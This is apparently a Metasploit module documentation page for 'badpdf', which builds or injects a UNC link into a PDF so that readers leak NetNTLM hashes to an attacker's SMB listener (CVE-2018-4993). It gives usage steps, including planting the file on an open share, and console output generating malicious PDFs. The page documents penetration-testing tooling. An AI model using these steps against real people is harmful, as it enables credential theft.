adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/auxiliary/fileformat/badpdf.md
T
h00die 557a15a115 spelling fixes on docs
2023-10-10 14:46:18 -04:00

92 lines
3.0 KiB
Markdown
Raw Blame History

This module will either create a blank pdf document which contains a UNC link which will connect back to LHOST if file FILENAME options is used
or if PDFINJECT option is used will try and inject the necessary UNC code into an existing PDF document.
## Vulnerable Application
Various PDF Readers. Note Adobe released the patch APSB18-09 to prevent this and
FoxIT after version 9.1 is no longer vulnerable.
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use auxiliary/fileformat/badpdf```
4. Customise Options as required
5. Do: ```run```
6. A file pointing back to the listening host will then be generated.
7. Configure auxiliary/server/capture/smb or similar to capture hashes.
8. Upload the document to an open share or similar and wait for hashes.
## Options
**FILENAME**
This option allows you to customise the generated filename.
This can be changed using set FILENAME test.pdf
**LHOST**
This option allows you to set the IP address of the SMB Listener that the document points to
This can be changed using set LHOST 192.168.1.25
**PDFINJECT**
This option allows you to inject the UNC code into an existing PDF document
This can be changed using set PDFINJECT /path/to/file/pdf.pdf
## Scenarios
### Microsoft Windows
```
Console output
```
```
msf auxiliary(fileformat/badpdf) > show info
Name: BADPDF Malicious PDF Creator
Module: auxiliary/fileformat/badpdf
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Richard Davy - secureyourit.co.uk
CheckPoint researchers - Assaf Baharav, Yaron Fruchtmann, Ido Solomon
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no Filename
LHOST yes Host listening for incoming SMB/WebDAV traffic
PDFINJECT no Path and filename to existing PDF to inject UNC link code into
Description:
This module can either creates a blank PDF file which contains a UNC
link which can be used to capture NetNTLM credentials, or if the
PDFINJECT option is used it will inject the necessary code into an
existing PDF document if possible.
References:
https://cvedetails.com/cve/CVE-2018-4993/
https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/
msf auxiliary(fileformat/badpdf) >
msf auxiliary(fileformat/badpdf) > set filename test.pdf
filename => test.pdf
msf auxiliary(fileformat/badpdf) > set lhost 192.168.1.28
lhost => 192.168.1.28
msf auxiliary(fileformat/badpdf) > exploit
[+] test.pdf stored at /root/.msf4/local/test.pdf
[\*] Auxiliary module execution completed
msf auxiliary(fileformat/badpdf) > set filename ""
filename =>
msf auxiliary(fileformat/badpdf) > set pdfinject /root/Desktop/example.pdf
pdfinject => /root/Desktop/example.pdf
msf auxiliary(fileformat/badpdf) > exploit
[+] Malicious file written to /root/Desktop/example_malicious.pdf
[\*] Auxiliary module execution completed
msf auxiliary(fileformat/badpdf) >
```
Reference in New Issue View Git Blame Copy Permalink